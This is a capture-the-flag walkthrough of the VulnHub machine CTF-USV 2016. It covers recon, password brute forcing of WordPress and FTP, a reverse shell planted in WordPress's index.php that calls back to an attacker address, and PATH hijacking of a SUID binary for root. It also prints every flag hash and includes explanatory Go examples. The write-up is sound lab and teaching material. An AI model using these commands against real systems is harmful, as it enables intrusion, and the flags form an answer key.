
VulnHub: USV 2016. CTF in Romania, what are they?



Good day to all. In this article we walk through the Romanian CTF-USV 2016, themed around "Game of Thrones". You can download the virtual machine image from VulnHub.

If you are curious what an inter-university CTF in Romania looks like, read on.

A little about the CTF


CTF-USV 2016 Security Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)

There are 7 flags, each in the format: Country_name Flag: [md5 hash]

Let's start!


Let's scan the target with nmap:

 $ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV -p1-65535

Starting Nmap 7.01 ( nmap.org ) at 2017-01-15 19:47 MSK
Nmap scan report for 192.168.1.102
Host is up (0.00057s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.3 (protocol 2.0)
80/tcp    open  http       Apache httpd
3129/tcp  open  http-proxy Squid http proxy 3.5.22
3306/tcp  open  mysql      MariaDB (unauthorized)
4444/tcp  open  http       Foundry EdgeIron switch http config
21211/tcp open  ftp        vsftpd 2.0.8 or later
MAC Address: 08:00:27:2B:64:55 (Oracle VirtualBox virtual NIC)
Service Info: Host: SevenKingdoms; Device: switch

Now let's start collecting flags.

Flag 1 (Croatia)


The first flag is simple. Run nikto, which immediately reports an unusual response header:

 $ nikto -h 192.168.1.102 

+ Uncommon header 'x-xss-protection' found, with contents: Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==

Decode it:

 $ echo Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg== | base64 -d
 Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb

Flag 2 (Italy)




This dragon banner greets us when connecting via ssh, and at the very bottom of it there is an encrypted string:
wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB

On closer inspection, some of the letters that make up the picture stand out. Putting them together we get:
AES ECB xxxxx0000000xxxxxx

We have the algorithm, the key and the ciphertext; decrypt it (for example, with an online AES tool) and get the second flag:

Italy Flag: 0047449b33fbae830d833721edaef6f1
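Once the algorithm, mode and key are known, the decryption itself is a few lines. The following is an added example, not code from the write-up: a Go AES-ECB decrypter for a base64 string that also validates the PKCS#7 padding, which is where a wrong key usually shows up. The real key is masked above, so the matching encrypt helper produces the test data with a constructed 16-byte key.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/base64"
	"fmt"
)

// DecryptECB base64-decodes b64, decrypts it block by block with AES in ECB
// mode (no IV, no chaining between blocks) and strips PKCS#7 padding.
// A wrong key almost always shows up as bad padding rather than readable text.
func DecryptECB(key []byte, b64 string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key) // key must be 16, 24 or 32 bytes
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a multiple of 16", len(ct))
	}
	pt := make([]byte, len(ct))
	for i := 0; i < len(ct); i += aes.BlockSize {
		block.Decrypt(pt[i:i+aes.BlockSize], ct[i:i+aes.BlockSize])
	}
	n := int(pt[len(pt)-1]) // PKCS#7: the last byte says how many pad bytes there are
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", fmt.Errorf("bad padding (wrong key?)")
	}
	return string(pt[:len(pt)-n]), nil
}

// EncryptECB is the inverse; it exists only to build test data with a
// constructed key, since the real CTF key is masked in the write-up.
func EncryptECB(key, pt []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	for i := 0; i < len(padded); i += aes.BlockSize {
		block.Encrypt(ct[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
	}
	return base64.StdEncoding.EncodeToString(ct), nil
}
```

ECB has no chaining, so two identical plaintext blocks always produce two identical ciphertext blocks; that is also why the mode should not be used outside puzzles like this one.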

Flag 3 (Portugal)


On to the web. There is a website (port 80) and a proxy (port 3129). After pointing the browser's proxy settings at the address and port of the proxy, in this case the target machine itself, we open the site:



Not much; let's continue:



Plain WordPress, nothing remarkable. Opening the index page takes us to a blog with several articles about "Game of Thrones". The first thing that catches the eye is the following post:



Opening this image, we notice that it is located in the hodor directory:



Going there, we are offered an archive to download:



Inside the archive is an image:



And the flag:

 $ echo UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y= | base64 -d
 Portugal Flag: a2663b23045de56c7e96a406429f733f

Flag 4 (Paraguay)


At the very bottom of the page, this post draws attention:



We crawl the site and build a password dictionary for brute forcing:

 cewl --proxy_host 192.168.1.102 --proxy_port 3129 http://192.168.1.102/blog/ > blog.lst 

After running for a while, patator returns the correct password:

 $ patator http_fuzz http_proxy=192.168.1.102:3129 url='http://192.168.1.102/blog/wp-login.php?action=postpass' method=POST header='Referer: "http://192.168.1.102/blog/index.php/2016/10/16/the-secret-chapter/"' body='post_password=FILE0&Submit=Enter' 0=blog.lst -x ignore:fgrep='post-password-form' follow=1 accept_cookie=1 



Enter it and get access to the content of this post:



We decode the base64 string found there and get a new flag:

 $ echo UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk= | base64 -d
 Paraguay Flag: 4761b65f20053674657c7e6186628a29
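From the defender's side, the same attack is easy to spot: a real post password is typed once, while a wordlist run produces a burst of POSTs to wp-login.php?action=postpass from one client. The following added example (not from the write-up) counts such attempts per client over constructed Apache access-log lines; the sample log, the threshold and the function names are all assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed access-log lines (not from the write-up): one client hammering
// the postpass endpoint with a wordlist, mixed with ordinary traffic. Note that
// wp-login.php?action=postpass answers 302 for wrong and right passwords alike
// (it only sets a cookie and redirects), so the status code is no signal.
const sampleLog = `192.168.1.124 - - [15/Jan/2017:19:55:01 +0300] "POST /blog/wp-login.php?action=postpass HTTP/1.1" 302 0
192.168.1.124 - - [15/Jan/2017:19:55:01 +0300] "POST /blog/wp-login.php?action=postpass HTTP/1.1" 302 0
192.168.1.50 - - [15/Jan/2017:19:55:02 +0300] "GET /blog/ HTTP/1.1" 200 5123
192.168.1.124 - - [15/Jan/2017:19:55:02 +0300] "POST /blog/wp-login.php?action=postpass HTTP/1.1" 302 0
192.168.1.124 - - [15/Jan/2017:19:55:02 +0300] "POST /blog/wp-login.php?action=postpass HTTP/1.1" 302 0
192.168.1.50 - - [15/Jan/2017:19:55:05 +0300] "POST /blog/wp-login.php?action=postpass HTTP/1.1" 302 0`

// Common log format: client, ident, user, [timestamp], "request", status, size.
var postpassRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "POST /blog/wp-login\.php\?action=postpass[^"]*"`)

// PostpassAttempts counts POSTs to the postpass endpoint per client address.
func PostpassAttempts(accessLog string) map[string]int {
	counts := map[string]int{}
	for _, line := range strings.Split(accessLog, "\n") {
		if m := postpassRe.FindStringSubmatch(line); m != nil {
			counts[m[1]]++
		}
	}
	return counts
}

// SuspiciousClients keeps only clients at or above the attempt threshold;
// a legitimate reader enters the password once, so a low threshold is fine.
func SuspiciousClients(accessLog string, threshold int) map[string]int {
	hits := map[string]int{}
	for ip, n := range PostpassAttempts(accessLog) {
		if n >= threshold {
			hits[ip] = n
		}
	}
	return hits
}

func main() {
	for ip, n := range SuspiciousClients(sampleLog, 3) {
		fmt.Printf("possible password guessing from %s: %d attempts\n", ip, n)
	}
}
```

On this box the requests went through the Squid proxy on the target itself, so the web server's own log would show the proxy's address rather than the attacker's; the Squid access log, or the X-Forwarded-For header Squid appends by default, is the better place to look.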

Flag 5 (Thailand)


If the post is to be believed, the password is right before our eyes; yes, the picture here is clearly relevant. But looking closely, there is a phrase below it:
She use the raining of replication for her army.

Great, we know where to log in, and now we have a password. At first I tried individual words, then added fragments of the phrase, and soon hydra found what was needed:



Connect:

 $ ftp 192.168.1.102 21211
 ftp> ls -ahl
 200 PORT command successful. Consider using PASV.
 150 Here comes the directory listing.
 dr-xr-xr-x    2 1000     1000         4096 Dec 05 20:05 .
 dr-xr-xr-x    2 1000     1000         4096 Dec 05 20:05 ..
 -rw-r--r--    1 0        0              94 Dec 05 20:04 .note.txt
 -rw-r--r--    1 0        0              32 Dec 05 20:05 readme.txt
 226 Directory send OK.

Download all the available files, then examine them:

 ftp> get readme.txt
 local: readme.txt remote: readme.txt
 200 PORT command successful. Consider using PASV.
 150 Opening BINARY mode data connection for readme.txt (32 bytes).
 226 Transfer complete.
 32 bytes received in 0.00 secs (226.4 kB/s)
 ftp> get .note.txt
 local: .note.txt remote: .note.txt
 200 PORT command successful. Consider using PASV.
 150 Opening BINARY mode data connection for .note.txt (94 bytes).
 226 Transfer complete.
 94 bytes received in 0.00 secs (791.4 kB/s)

There is nothing interesting in the first file:

readme.txt
I keep a hidden note for myself

But the second one deserves attention:

.note.txt
I used my children`s name.

- = Daenerys = -

We have a hint for the password: the names of her children. Google quickly told us which children were meant and what their names are, so we generate a dictionary with crunch:

 $ crunch 1 1 -p Rhaegal Viserion Drogon > dragons 

We feed it to wpscan for brute forcing:

 $ sudo ./wpscan.rb --proxy 192.168.1.102:3129 --url http://192.168.1.102/blog/ --username mother_of_dragons --wordlist dragons 



After some time, we get the password for the WordPress admin panel. Log in and find the following flag in the current user's profile:



 $ echo VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM= | base64 -d
 Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733

Flag 6 (Mongolia)


As it turns out, Daenerys has administrator rights on this blog, so by editing the index.php file we give ourselves a shell, adding the line:

 system('bash -i >& /dev/tcp/192.168.1.124/4444 0>&1'); 

Start netcat, reload the page in the browser, and get a shell:



Looking around the system, the file reward_flag.txt in the web server directory draws attention:

 [http@arch blog]$ ls -ahl ../
 total 92K
 drwxr-xr-x 3 root root 4.0K Nov 17 15:43 .
 drwxr-xr-x 4 root root 4.0K May 31  2013 ..
 drwxr-xr-x 6 http http 4.0K Jan 15 19:52 blog
 -rw-r--r-- 1 root root  59K Nov 16 19:59 gtr.jpg
 -rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html
 -rw-r--r-- 1 root root   65 Nov 17 15:41 reward_flag.txt
 -rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messenger

Let's open it; there should be a flag inside:

 [http@arch blog]$ cat ../reward_flag.txt
 TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=
 [http@arch blog]$ echo TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ= | base64 -d
 Mongolia Flag: 6b49c13cccd91940f09d79e142108394

Flag 7 (Somalia)


In the same directory as the last flag there is also an application, winterfell_messenger, which, judging by the SUID bit, will probably help us escalate privileges on the system. Run it and see what it does:

 [http@arch http]$ ./winterfell_messenger
 cat: /root/message.txt: No such file or directory

So, what about its strings?

[http@arch http]$ strings ./winterfell_messenger
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-8
AWAVA
AUATL
[]A\A]A^A_
cat /root/message.txt
;*3$"
GCC: (GNU) 6.1.1 20160802
GCC: (GNU) 6.2.1 20160830
init.c
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6916
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment


Reversing is not even necessary: we have setuid and system, and the latter is given a relative path for the cat command. From the documentation for system we know that:
system() executes the command specified in string by calling /bin/sh -c string, and returns after the command has been completed.

So we follow the familiar recipe:

 [http@arch http]$ PATH=/tmp:$PATH
 [http@arch http]$ echo "/bin/bash" > /tmp/cat
 [http@arch tmp]$ chmod +x cat

Run the vulnerable program and get the shell:

 [http@arch tmp]$ /srv/http/winterfell_messenger
 /srv/http/winterfell_messenger
 id
 uid=0(root) gid=33(http) groups=33(http)
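Why a bare cat inside a setuid program is enough: /bin/sh resolves the name through whatever PATH the caller supplies, so the caller decides which binary runs as root. The added Go example below (not code from the write-up or from the CTF binary) models that lookup with a constructed stand-in for the filesystem, beside the hardened form that ignores the caller's environment; all function names are assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// Resolve mimics how /bin/sh -c, and therefore system(), finds a bare command
// name: walk PATH left to right and take the first directory that has it.
// exists stands in for the filesystem so the example runs anywhere.
func Resolve(pathEnv, name string, exists func(string) bool) (string, bool) {
	if strings.Contains(name, "/") { // a path is used as given; PATH is never consulted
		return name, exists(name)
	}
	for _, dir := range strings.Split(pathEnv, ":") {
		if dir == "" { // an empty PATH element means the current directory
			dir = "."
		}
		if candidate := dir + "/" + name; exists(candidate) {
			return candidate, true
		}
	}
	return "", false
}

// ctfBox models the filesystem after the write-up's steps: the real cat plus
// the planted /tmp/cat (a constructed stand-in, not a real lookup).
func ctfBox(p string) bool { return p == "/tmp/cat" || p == "/usr/bin/cat" }

// VulnerableMessenger is what winterfell_messenger's system("cat /root/message.txt")
// amounts to: the caller's PATH decides which "cat" runs with root privileges.
func VulnerableMessenger(callerPath string) string {
	p, _ := Resolve(callerPath, "cat", ctfBox)
	return p
}

// HardenedMessenger ignores the caller's environment and names the tool by
// absolute path (in C: execv("/usr/bin/cat", ...) or a fixed PATH before system()).
func HardenedMessenger(callerPath string) string {
	p, _ := Resolve("/usr/bin:/bin", "/usr/bin/cat", ctfBox) // callerPath deliberately unused
	return p
}

func main() {
	fmt.Println(VulnerableMessenger("/tmp:/usr/bin:/bin")) // /tmp/cat: the planted script runs as root
	fmt.Println(VulnerableMessenger("/usr/bin:/bin"))      // /usr/bin/cat
	fmt.Println(HardenedMessenger("/tmp:/usr/bin:/bin"))   // /usr/bin/cat regardless of PATH
}
```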

In the root directory we find the last flag:

 echo U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA== | base64 -d
 Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34

And we accept congratulations:



As stated in the description, this is their first CTF. For a first attempt it will do, but it should not be repeated as is; let's hope they keep developing the topic and add more sophisticated tasks, because in real life, unfortunately, nobody is surprised any more by a banal directory scan.

Source: https://habr.com/ru/post/319586/
